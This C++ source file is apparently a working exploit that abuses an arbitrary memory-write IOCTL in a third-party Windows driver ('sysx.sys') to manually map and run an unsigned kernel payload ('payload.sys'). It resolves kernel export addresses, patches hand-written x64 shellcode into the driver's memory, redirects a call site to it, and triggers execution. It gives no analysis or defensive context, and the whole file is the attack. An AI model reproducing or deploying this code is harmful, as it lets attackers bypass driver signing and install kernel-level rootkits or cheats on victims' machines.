#include <intrin.h>
#include <windows.h>
#include <iostream>
#include <winternl.h>
#pragma comment(lib,"ntdll.lib")

#define SystemModuleInformationClass  11

typedef struct
{
	HANDLE Section;
	PVOID MappedBase;
	PVOID Base;
	ULONG Size;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT PathLength;
	CHAR ImageName[256];
} SYSTEM_MODULE, *PSYSTEM_MODULE;

typedef struct
{
	ULONG ModuleCount;
	SYSTEM_MODULE Module[0];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;


EXTERN_C
NTSTATUS ZwQuerySystemInformation(
	ULONG SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength OPTIONAL
);

EXTERN_C
NTSTATUS ZwCreateFile(
	OUT PHANDLE FileHandle,
	IN ACCESS_MASK DesiredAccess,
	IN POBJECT_ATTRIBUTES ObjectAttributes,
	OUT PIO_STATUS_BLOCK IoStatusBlock,
	IN PLARGE_INTEGER AllocationSize OPTIONAL,
	IN ULONG FileAttributes,
	IN ULONG ShareAccess,
	IN ULONG CreateDisposition,
	IN ULONG CreateOptions,
	IN PVOID EaBuffer OPTIONAL,
	IN ULONG EaLength);


PVOID GetKernelModule(const char* name) {
	PVOID result = 0;
	ULONG BufferSize = 0;
	NTSTATUS ntStatus = ZwQuerySystemInformation(SystemModuleInformationClass, NULL, 0, &BufferSize);
	PSYSTEM_MODULE_INFORMATION pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)malloc(BufferSize);;
	if (pSystemModuleInformation == NULL) {
		printf("[bingji] ZwQuerySystemInformation error %x\n", ntStatus);
		return 0;
	}
	ntStatus = ZwQuerySystemInformation(SystemModuleInformationClass, pSystemModuleInformation, BufferSize, NULL);
	if (!NT_SUCCESS(ntStatus)) {
		printf("[bingji] ZwQuerySystemInformation error\n");
		free(pSystemModuleInformation);
		return 0;
	}
	PSYSTEM_MODULE pSystemModule = pSystemModuleInformation->Module;
	for (int count = 0; count < pSystemModuleInformation->ModuleCount; count++) {
		if (strstr(pSystemModule[count].ImageName, name)) {
			result = pSystemModule[count].Base;
			break;
		}
	}
	free(pSystemModuleInformation);
	return result;
}



int main() {
	DWORD64 ntoskrnl = (DWORD64)GetKernelModule("ntoskrnl.exe");
	if(ntoskrnl == 0) {
		printf("[bingji] get ntoskrnl error.\n");
		return 0;
	}
	DWORD64 sysx = (DWORD64)GetKernelModule("sysx.sys");
	if (ntoskrnl == 0) {
		printf("[bingji] get sysx error.\n");
		return 0;
	}
	printf("[bingji] ntoskrnl:%p\n", ntoskrnl);
	printf("[bingji] sysx:%p\n", ntoskrnl);
	HMODULE NtLoadBase = LoadLibraryExA("ntoskrnl.exe", 0, DONT_RESOLVE_DLL_REFERENCES);
	printf("[bingji] NtLoadBase:%p\n", NtLoadBase);

	HMODULE  payload = LoadLibraryExA("payload.sys", 0, DONT_RESOLVE_DLL_REFERENCES);
	PIMAGE_DOS_HEADER pDosHeader  = (PIMAGE_DOS_HEADER)(payload);
	PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS)(LPVOID)((DWORD64)(payload)+pDosHeader ->e_lfanew);
	DWORD pp;
	VirtualProtect(payload, pNTHeader->OptionalHeader.SizeOfImage, PAGE_READWRITE,&pp);

	unsigned char context[] =
	{
	0x40, 0x53,													// push    rbx
	0x48, 0x83, 0xEC, 0x20,										// sub     rsp, 0x20
	0xBA, 0x00, 0x00, 0x00, 0x00,								// mov     edx, len
	0x33, 0xC9,													// xor     ecx, ecx
	0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov     rax, ExAllocatePool
	0xFF, 0xD0,													// call    rax
	0x48, 0x8B, 0xD8,											// mov     rbx, rax
	0x48, 0x8B, 0xC8,											// mov     rcx, rax
	0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov     rax, memcpy
	0x48, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // mov     rdx, payload
	0x41, 0xB8, 0x00, 0x00, 0x00, 0x00,							// mov     r8d, len
	0xFF, 0xD0,													// call    rax
	0x48, 0x8D, 0x83, 0x00, 0x00, 0x00, 0x00,					// lea     rax, qword ptr ds:[rbx+AddressOfEntryPoint]
	0x33, 0xD2,													// xor     edx, edx
	0x33, 0xC9,													// xor     ecx, ecx
	0xFF, 0xD0,													// call    rax
	0x33, 0xC0,													// xor     eax, eax
	0x48, 0x83, 0xC4, 0x20,										// add     rsp, 0x20
	0x5B,														// pop     rbx
	0xC3														// ret     
	};
	*(DWORD*)(  &context[0x07]) = pNTHeader->OptionalHeader.SizeOfImage;
	*(DWORD*)(  &context[0x35]) = pNTHeader->OptionalHeader.SizeOfImage;
	*(DWORD64*)(&context[0x0F]) = (((DWORD64)GetProcAddress(NtLoadBase, "ExAllocatePool") - (DWORD64)NtLoadBase) + ntoskrnl);
	*(DWORD64*)(&context[0x21]) = (((DWORD64)GetProcAddress(NtLoadBase, "memcpy") - (DWORD64)NtLoadBase) + ntoskrnl);
	*(DWORD64*)(&context[0x2b]) = (DWORD64)payload;
	*(DWORD*)(&context[0x3e])   = pNTHeader->OptionalHeader.AddressOfEntryPoint;
	
	DWORD64 Offset = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
	PIMAGE_IMPORT_DESCRIPTOR pID = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD64)payload + Offset);
	while (pID->Characteristics != 0)
	{
		PIMAGE_THUNK_DATA pRealIAT = (PIMAGE_THUNK_DATA)((DWORD64)payload + pID->FirstThunk);
		PIMAGE_THUNK_DATA pOriginalIAT = (PIMAGE_THUNK_DATA)((DWORD64)payload + pID->OriginalFirstThunk);
		for (int i = 0; ; i++)
		{
			if (pOriginalIAT[i].u1.Function == 0)
			{
				break;
			}
			
			FARPROC lpFunction = NULL;
			PIMAGE_IMPORT_BY_NAME pByName = (PIMAGE_IMPORT_BY_NAME)((DWORD64)payload + (DWORD64)(pOriginalIAT[i].u1.AddressOfData));
			if ((char*)pByName->Name)
			{
				lpFunction = (FARPROC) (((DWORD64)GetProcAddress(NtLoadBase, pByName->Name) - (DWORD64)NtLoadBase) + ntoskrnl);
			}

			if (lpFunction != NULL)
				pRealIAT[i].u1.Function = (DWORD64)lpFunction;
			
		}
		pID = (PIMAGE_IMPORT_DESCRIPTOR)((DWORD64)pID + sizeof(IMAGE_IMPORT_DESCRIPTOR));
	}
	

	OBJECT_ATTRIBUTES objectAttributes;
	IO_STATUS_BLOCK iostatus;
	HANDLE DeviceHandle = 0;
	UNICODE_STRING logFileUnicodeString;

	RtlInitUnicodeString(&logFileUnicodeString, L"\\Device\\sys");
	InitializeObjectAttributes(&objectAttributes,
	                           &logFileUnicodeString,
	                           OBJ_CASE_INSENSITIVE,
	                           NULL,
	                           NULL);

	NTSTATUS ntStatus = ZwCreateFile(&DeviceHandle,
	                                 GENERIC_READ | GENERIC_WRITE,
	                                 &objectAttributes,
	                                 &iostatus,
	                                 NULL,
	                                 FILE_ATTRIBUTE_NORMAL,
	                                 FILE_SHARE_READ | FILE_SHARE_WRITE,
	                                 OPEN_EXISTING,
	                                 0,
	                                 NULL,
	                                 0);

	printf("[bingji] ZwCreateFile result:%x\n", ntStatus);

	struct uhaozu_memcpy
	{
		unsigned __int64 s;
		unsigned int len;
		unsigned int pid;
		unsigned __int64 address;
		unsigned __int64 u[3];
		unsigned __int64 result;
		unsigned char buffer[0x100];
	};

	uhaozu_memcpy input;
	input.pid = (unsigned int)GetCurrentProcessId();
	input.address = sysx + 0x153D50;
	input.len = sizeof(context);
	memcpy(input.buffer, context, sizeof(context));
	DWORD lp = 0;
	int result = DeviceIoControl(DeviceHandle, 0x830A4000, &input, sizeof(input), &input, sizeof(input), &lp, 0);
	printf("[bingji] write  context : sysx + 0x153D50 , result:%x\n", result);


	DWORD jmp = (0x153D50 - 0x103D9 ) -  5;
	input.address = sysx + 0x103D9 + 1;
	input.len = sizeof(jmp);
	memcpy(input.buffer, &jmp, sizeof(jmp));
    result = DeviceIoControl(DeviceHandle, 0x830A4000, &input, sizeof(input), &input, sizeof(input), &lp, 0);
	printf("[bingji] write  call : sysx + 0x103D9 , result:%x\n", result);

	//call context
	DeviceIoControl(DeviceHandle, 0x82094000, &input, sizeof(input), &input, sizeof(input), &lp, 0);
	
	Sleep(-1);

}
